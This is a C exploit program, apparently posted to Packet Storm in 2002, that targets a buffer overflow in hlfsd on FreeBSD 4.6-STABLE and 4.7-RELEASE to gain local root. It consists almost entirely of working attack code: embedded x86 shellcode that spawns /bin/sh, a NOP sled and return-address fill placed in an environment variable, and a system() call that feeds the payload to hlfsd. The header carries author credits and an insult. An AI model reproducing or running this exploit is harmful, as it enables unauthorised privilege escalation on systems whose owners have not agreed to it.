Hi Packetstormsecurity guys.

/*
* hlfsd-xp.c                                                                            
* Local root exploit for hlfsd.                                                         
* 1) FreeBSD 4.7-RELEASE
* 2) FreeBSD 4.6-STABLE
* hlfsd not suid by default, but if... g0t r00t.                                        
* argv[1] - buffer size (def: 1000), argv[2] - offset (def: 0)                          
* Thanks to: thefate, v1pee, Billi_k1d, meff, lbyte,xaoc                                
* Fuckz to: S|{IF yestarday you hurt me bad, you think I'm worse than
*           you are? fuck you then!
*                                                                                       
* r00terX, NERF gr0up. (c) 2002 <under@azerinet.com>, nerf.ru                           
* advisory by division7                                                                 
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1041

char freebsdshellcode[] ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
                "\xb0\x3b\x50\xcd\x80";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}
                                
struct TARGET {
        char *type;
        char *shellcode;
        int pad;
};

struct TARGET targets [] = {
{"Freebsd 4.6-STABLE -x86 shellcode",freebsdshellcode,120},
{"Freebsd 4.7-RELEASE -x86 shellcode",freebsdshellcode,0},
{NULL, NULL, 0}
};

void ussage (char *argv);

int main(int argc, char **argv) {
char *buff, *ptr;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i;
int target;

if ((argc < 2))
ussage(argv[0]);
target = atoi(argv[1]);

if(!(buff = malloc(bsize))) {
printf("Can\`t allocate memory.\n");
exit(0);
}

addr = get_sp() - targets[target].pad;

printf("Using target: %s\n", targets[target].type);
printf("Using address: 0x%x\n", addr);
printf("Using buffer size: %d\n", DEFAULT_BUFFER_SIZE);
printf("Using offset: %d\n", targets[target].pad);

ptr = buff;
addr_ptr = (long *) ptr;
for(i=0; i<bsize; i+=4)
*(addr_ptr++) = addr;

for(i=0;i < bsize/2;i++)
buff[i]=NOP;

ptr = buff+((bsize/2)-(strlen(targets[target].shellcode)/2));

for(i=0;i < strlen(targets[target].shellcode); i++)
*(ptr++) = targets[target].shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/usr/sbin/hlfsd -x $EGG");
}

void list_targets () {
        int i;
        for (i=0; targets[i].type != NULL; i++) {
        fprintf (stderr, "%d) - %s\n", i, targets[i].type);
}
}
                                        
void ussage (char *argv) {
        printf ("%s - hlfsd local exploit\n",argv);
        printf ("written by r00terX\n\n");      
        printf ("Ussage %s <target type> \ntargets avalible:\n\n");
        list_targets ();
        exit(0);
}